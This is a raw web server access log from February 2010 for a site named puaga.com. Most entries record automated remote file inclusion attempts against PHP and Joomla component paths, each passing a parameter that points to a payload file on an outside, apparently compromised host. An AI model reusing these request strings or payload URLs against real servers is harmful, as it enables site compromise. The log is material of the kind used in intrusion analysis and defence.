218.234.21.178 - - [21/Feb/2010:10:14:36 -0800] "GET /include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:36 -0800] "GET /logs/access_100127.log%20%20//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:36 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.82.194.38 - - [21/Feb/2010:10:14:46 -0800] "GET /logs/access_100122.log HTTP/1.1" 404 5258 "-" "Layaqfyrufwglu8L mmiuesjsmopigfileowwr" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:14:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:14:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:14:57 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:15:05 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:15:06 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:15:08 -0800] "GET /logs/access_100122.log%20%20///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:11 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:11 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:13 -0800] "GET /logs/access_100126.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:15 -0800] "GET /logs/access_100126.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:15 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:17 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:24 -0800] "GET /logs/access_100130.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:15:29 -0800] "GET /logs/access_100130.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:09 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:09 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:12 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:12 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:10:16:13 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:16:27 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:16:27 -0800] "GET /logs/access_100126.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:16:28 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:16:32 -0800] "GET /logs/access_100130.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:10:16:47 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:49 -0800] "GET /logs/access_100124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:16:50 -0800] "GET /logs/access_100124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:17:05 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:17:06 -0800] "GET /logs/access_100126.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:17:07 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:17:11 -0800] "GET /logs/access_100130.log%20%20//skin/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:17:22 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:17:22 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:17:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:10:17:52 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:10:18:18 -0800] "GET /logs/access_100211.log//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:10:18:40 -0800] "GET /logs/access_100211.log//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:20:18 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:20:18 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:20:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:20:19 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:20:20 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:20:20 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:21:09 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:10:21:16 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:21:34 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:21:34 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:21:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:51 -0800] "GET /pictures/p11 HTTP/1.0" 301 77 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:52 -0800] "GET /pictures/p11/ HTTP/1.0" 302 34450 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:53 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:54 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:55 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:56 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [21/Feb/2010:10:21:56 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
210.116.103.96 - - [21/Feb/2010:10:22:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:22:23 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:22:23 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:10:22:32 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:36 -0800] "GET /logs//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:36 -0800] "GET /include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:36 -0800] "GET /logs/access_100207.log%20%20//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:36 -0800] "GET /logs/access_100127.log%20%20//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:37 -0800] "GET /logs//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:37 -0800] "GET /include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:37 -0800] "GET /logs/access_100207.log%20%20//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:23:40 -0800] "GET /logs/access_100127.log%20%20//include/variable.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:24:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:24:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:24:21 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:24:54 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:24:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:24:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:25:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:25:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:10:25:29 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:25:36 -0800] "GET /skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:25:36 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:25:36 -0800] "GET /logs/access_100204.log%20%20//skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:25:49 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:25:53 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:26:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:26:06 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:26:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:26:18 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:10:26:29 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:27:02 -0800] "GET /phplive/setup/header.php?css_pathhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:10:27:03 -0800] "GET /logs/phplive/setup/header.php?css_pathhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:27:30 -0800] "GET /logs/access_100124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:10:27:34 -0800] "GET /logs/access_100124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:27:38 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:27:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:27:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:10:28:36 -0800] "GET /logs/access_100115.log%20%20//skin/zero_vote/login.php?dir=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:49 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:49 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:49 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:53 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:54 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:28:54 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.30.73.207 - - [21/Feb/2010:10:29:01 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dinskaya.ru/stanica/images/list.txt?%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.817" "www.puaga.com"
87.30.73.207 - - [21/Feb/2010:10:29:01 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dinskaya.ru/stanica/images/list.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.817" "www.puaga.com"
87.30.73.207 - - [21/Feb/2010:10:29:01 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dinskaya.ru/stanica/images/list.txt?%0D?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.817" "www.puaga.com"
87.30.73.207 - - [21/Feb/2010:10:29:20 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dinskaya.ru/stanica/images/list.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.817" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:29:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [21/Feb/2010:10:29:51 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
